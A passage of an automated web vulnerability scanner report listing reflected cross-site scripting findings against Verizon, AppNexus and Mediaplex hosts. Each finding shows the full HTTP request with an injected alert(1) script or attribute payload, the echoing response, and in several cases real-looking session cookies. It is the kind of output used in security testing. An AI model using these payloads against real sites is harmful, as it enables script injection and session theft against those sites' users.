User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; NEWSROOMDOTCOMAPPID=7vcFMnqWJ7sbrnjg1zy7d0xlsg1ZQWRzx7fvcwVpRfvbX14Q35GG!724584707; WT_FPC=id=253e1ed4f4eb762baaf1290210694076:lv=1290210720009:ss=1290210694076; CP=null*; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Date: Sat, 20 Nov 2010 08:38:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 99480


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>


   <head>


<title>Headlines</title>
...[SNIP]...
<meta property="og:url" content="http://headlines.verizon.com/headlines/portals/headlines.portal?_nfpb=true&_pageLabel=headlines_portal_page__article&_article=31999638b869"style="x:expression(alert(1))"0a9a1a8d65c"/>
...[SNIP]...

2.401. http://headlines.verizon.com/headlines/portals/headlines.portal [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/portals/headlines.portal

Issue detail

The value of the _pageLabel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a29f5"style%3d"x%3aexpression(alert(1))"9c0eacd0b77 was submitted in the _pageLabel parameter. This input was echoed as a29f5"style="x:expression(alert(1))"9c0eacd0b77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /headlines/portals/headlines.portal?_nfpb=true&_pageLabel=headlines_portal_page_mediarooma29f5"style%3d"x%3aexpression(alert(1))"9c0eacd0b77 HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; NEWSROOMDOTCOMAPPID=7vcFMnqWJ7sbrnjg1zy7d0xlsg1ZQWRzx7fvcwVpRfvbX14Q35GG!724584707; WT_FPC=id=253e1ed4f4eb762baaf1290210694076:lv=1290210708975:ss=1290210694076; CP=null*

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Date: Sat, 20 Nov 2010 08:36:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 189310


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>


   <head>


<title>Headlines - Veriz
...[SNIP]...
<input id="_pageLabel" type="hidden" value="headlines_portal_page_mediarooma29f5"style="x:expression(alert(1))"9c0eacd0b77" >
...[SNIP]...

2.402. http://headlines.verizon.com/headlines/portals/headlines.portal [_photoid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/portals/headlines.portal

Issue detail

The value of the _photoid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11c17"style%3d"x%3aexpression(alert(1))"938623c96bc was submitted in the _photoid parameter. This input was echoed as 11c17"style="x:expression(alert(1))"938623c96bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /headlines/portals/headlines.portal?_nfpb=true&_pageLabel=headlines_portal_page_gallery&_photoid=63733319265685711c17"style%3d"x%3aexpression(alert(1))"938623c96bc HTTP/1.1
Host: headlines.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vzapps=STATE=TX; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; vzpers=STATE=TX; ProductXML=A; NEWSROOMDOTCOMAPPID=7vcFMnqWJ7sbrnjg1zy7d0xlsg1ZQWRzx7fvcwVpRfvbX14Q35GG!724584707; LOB_CATEGORY=; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; WT_FPC=id=253e1ed4f4eb762baaf1290210694076:lv=1290210745128:ss=1290210694076; CustTrackPage=GHP; BusinessUnit=business; V347=CT-2; CP=null*; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Date: Sat, 20 Nov 2010 10:07:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100453


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>


   <head>


<title>Headlines</title>
...[SNIP]...
<meta property="og:url" content="http://headlines.verizon.com/headlines/portals/headlines.portal?_nfpb=true&_pageLabel=headlines_portal_page_gallery&_photoid=63733319265685711c17"style="x:expression(alert(1))"938623c96bc"/>
...[SNIP]...

2.403. http://headlines.verizon.com/headlines/portlets/horoscope/getContent.jsp [horoSign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/portlets/horoscope/getContent.jsp

Issue detail

The value of the horoSign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31d4"onerror%3d"alert(1)"b3fea2e4b23 was submitted in the horoSign parameter. This input was echoed as c31d4"onerror="alert(1)"b3fea2e4b23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /headlines/portlets/horoscope/getContent.jsp?horoSign=c31d4"onerror%3d"alert(1)"b3fea2e4b23 HTTP/1.1
Host: headlines.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vzapps=STATE=TX; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; vzpers=STATE=TX; ProductXML=A; NEWSROOMDOTCOMAPPID=7vcFMnqWJ7sbrnjg1zy7d0xlsg1ZQWRzx7fvcwVpRfvbX14Q35GG!724584707; LOB_CATEGORY=; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; WT_FPC=id=253e1ed4f4eb762baaf1290210694076:lv=1290210745128:ss=1290210694076; CustTrackPage=GHP; BusinessUnit=business; V347=CT-2; CP=null*; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 226
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 10:15:38 GMT
Connection: close
Set-Cookie: NEWSROOMDOTCOMAPPID=Gt4mMnfJwlDBGr6GG1LdDYxrLPM9LXgLr4pVTX01NSQzHkGJKlF4!724584707; path=/


<div id="divHoro">
   
   
</div>


<div id="div2Horo"><img src="/headlines/resources/images/horoscope/c31d4"onerror="alert(1)"b3fea2e4b23.gif"></img></div>
<div id="div3H
...[SNIP]...

2.404. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ece2'%3balert(1)//4fe7839fbc was submitted in the redir parameter. This input was echoed as 9ece2';alert(1)//4fe7839fbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=316&size=300x250&inv_code=1532283&referrer=http://www.drudgereport.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D316%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D15322839ece2'%3balert(1)//4fe7839fbc HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: sess=1; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R=G#<hF[085K80?=O$KqY+(W^sKvh:SKd8e:HDCv#1R]SY]@D-4d'AB>*82>zh.uUX*[%F0%r>%W):ybqNYzgtYFiU`0>H_w*)Ctahu%b<(EHxJ#5h3aOdii_+(YP87?g=%9hBpMPCSI:C]-dwP`n!F93/]^9/`kU3jk.'t#4YsPJ6tY]Ss0Qg:$7-i]m.zGMC$xGe#'.SqURh#BI.E; uuid2=5675696235378120575

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 22-Nov-2010 14:01:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb229096=7=8Ic208WM#Xj_*0nf8MLVDzR?enc=juM4zt3d3T8AAACgR-HaPwAAAKBH4do_zczMzMzM3D8AAAAAAADgP-GTK7G1ObVEfxe8qqcfxE4_JulMAAAAAIUJAQA8AQAAVQIAAAIAAAD-9gEAAQAAAFVTRABVU0QALAH6AKgGAABFCQICBQIFAAAAAADeIpzU&tt_code=1532283&udj=uf%28%27a%27%2C+5950%2C+1290348095%29%3Buf%28%27c%27%2C+32124%2C+1290348095%29%3Buf%28%27r%27%2C+128766%2C+1290348095%29%3Bppv%286754%2C+%274950926817888015329%27%2C+1290348095%2C+1291557695%2C+32124%2C+8113%29%3B&cnd=!mxYT6gj8-gEQ_u0HGKUtILE_KAAxAAAAAAAA4D9CEwgAEAAYACABKP7__________wFCCwjiNBAAGAAgAygBQgsI4jQQABgAIAIoAUgAUABYqA0.; path=/; expires=Mon, 22-Nov-2010 14:01:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sun, 21 Nov 2010 14:01:35 GMT
Content-Length: 194

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=316&anprice=40&ad_type=ad&ad_size=300x250&section=15322839ece2';alert(1)//4fe7839fbc"></scr'+'ipt>');

2.405. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cebe2"%3balert(1)//3da98720516 was submitted in the mpck parameter. This input was echoed as cebe2";alert(1)//3da98720516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11918-115416-6552-1%3Fmpt%3D1425460cebe2"%3balert(1)//3da98720516&mpt=1425460&mpvc=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/170469798/direct;wi.300;hi.250/01/5979345757?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=654669639587; mojo2=7992:17349/9609:1178/9608:1178; __utmz=183366586.1289806433.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1793538434.1289806433.1289806433.1289806433.1; mojo3=11918:6552/15341:16454/7992:3633/14302:16279/9608:1178/12896:14296/12309:1281/9966:27904/15017:245

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 00:06:02 GMT
Server: Apache
Last-Modified: Wed, 10 Nov 2010 19:53:50 GMT
ETag: "77f633-dd1-494b837542f80"
Accept-Ranges: bytes
Content-Length: 8807
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=
...[SNIP]...
ANDOM=5979345757/pageid=8987153005/relocate=http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href=http://altfarm.mediaplex.com/ad/ck/11918-115416-6552-1?mpt=1425460cebe2";alert(1)//3da98720516\" target=\"_blank\">
...[SNIP]...

2.406. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73f68"><script>alert(1)</script>9b4d64e9000 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11918-115416-6552-1%3Fmpt%3D142546073f68"><script>alert(1)</script>9b4d64e9000&mpt=1425460&mpvc=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/170469798/direct;wi.300;hi.250/01/5979345757?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=654669639587; mojo2=7992:17349/9609:1178/9608:1178; __utmz=183366586.1289806433.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1793538434.1289806433.1289806433.1289806433.1; mojo3=11918:6552/15341:16454/7992:3633/14302:16279/9608:1178/12896:14296/12309:1281/9966:27904/15017:245

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 00:05:57 GMT
Server: Apache
Last-Modified: Wed, 10 Nov 2010 19:53:50 GMT
ETag: "77f633-dd1-494b837542f80"
Accept-Ranges: bytes
Content-Length: 8993
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=
...[SNIP]...
ANDOM=5979345757/pageid=8987153005/relocate=http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href=http://altfarm.mediaplex.com/ad/ck/11918-115416-6552-1?mpt=142546073f68"><script>alert(1)</script>9b4d64e9000" TARGET="_blank">
...[SNIP]...

2.407. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30cc6"><script>alert(1)</script>67d4fb67b88 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11918-115416-6552-1%3Fmpt%3D1425460&mpt=1425460&mpvc=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href=30cc6"><script>alert(1)</script>67d4fb67b88 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/170469798/direct;wi.300;hi.250/01/5979345757?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=654669639587; mojo2=7992:17349/9609:1178/9608:1178; __utmz=183366586.1289806433.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1793538434.1289806433.1289806433.1289806433.1; mojo3=11918:6552/15341:16454/7992:3633/14302:16279/9608:1178/12896:14296/12309:1281/9966:27904/15017:245

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 00:06:08 GMT
Server: Apache
Last-Modified: Wed, 10 Nov 2010 19:53:50 GMT
ETag: "77f633-dd1-494b837542f80"
Accept-Ranges: bytes
Content-Length: 8993
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href=30cc6"><script>alert(1)</script>67d4fb67b88http://altfarm.mediaplex.com/ad/ck/11918-115416-6552-1?mpt=1425460" TARGET="_blank">
...[SNIP]...

2.408. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72326"%3balert(1)//07b5f4ab367 was submitted in the mpvc parameter. This input was echoed as 72326";alert(1)//07b5f4ab367 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11918-115416-6552-1%3Fmpt%3D1425460&mpt=1425460&mpvc=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href=72326"%3balert(1)//07b5f4ab367 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/170469798/direct;wi.300;hi.250/01/5979345757?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=654669639587; mojo2=7992:17349/9609:1178/9608:1178; __utmz=183366586.1289806433.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1793538434.1289806433.1289806433.1289806433.1; mojo3=11918:6552/15341:16454/7992:3633/14302:16279/9608:1178/12896:14296/12309:1281/9966:27904/15017:245

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 00:06:16 GMT
Server: Apache
Last-Modified: Wed, 10 Nov 2010 19:53:50 GMT
ETag: "77f633-dd1-494b837542f80"
Accept-Ranges: bytes
Content-Length: 8783
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=
...[SNIP]...
50/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href=72326";alert(1)//07b5f4ab367http://altfarm.mediaplex.com%2Fad%2Fck%2F11918-115416-6552-1%3Fmpt%3D1425460&clickTag=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAM
...[SNIP]...

2.409. http://img.mediaplex.com/content/0/14302/93015/trust_live_120x600.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/93015/trust_live_120x600.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e665b"%3balert(1)//b0edd64c17a was submitted in the mpck parameter. This input was echoed as e665b";alert(1)//b0edd64c17a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14302/93015/trust_live_120x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-93015-2042-15%3Fmpt%3D1290346950383e665b"%3balert(1)//b0edd64c17a&mpt=1290346950383&mpvc=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000846013/cstr=34858683=_4ce92233,6585770712,708689^846013^1^0,1_/xsxdata=$xsxdata/bnum=34858683/optn=64?trg=&placementid=1430293015204215& HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 13:48:35 GMT
Server: Apache
Last-Modified: Tue, 25 May 2010 18:37:44 GMT
ETag: "429192-c4e-4876f73fe2e00"
Accept-Ranges: bytes
Content-Length: 6482
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_1430293015204215&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">" )
...[SNIP]...
te=0000708689/mnum=0000846013/cstr=34858683=_4ce92233,6585770712,708689^846013^1^0,1_/xsxdata=$xsxdata/bnum=34858683/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-93015-2042-15?mpt=1290346950383e665b";alert(1)//b0edd64c17a\" target=\"_blank\">
...[SNIP]...

2.410. http://img.mediaplex.com/content/0/14302/93015/trust_live_120x600.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
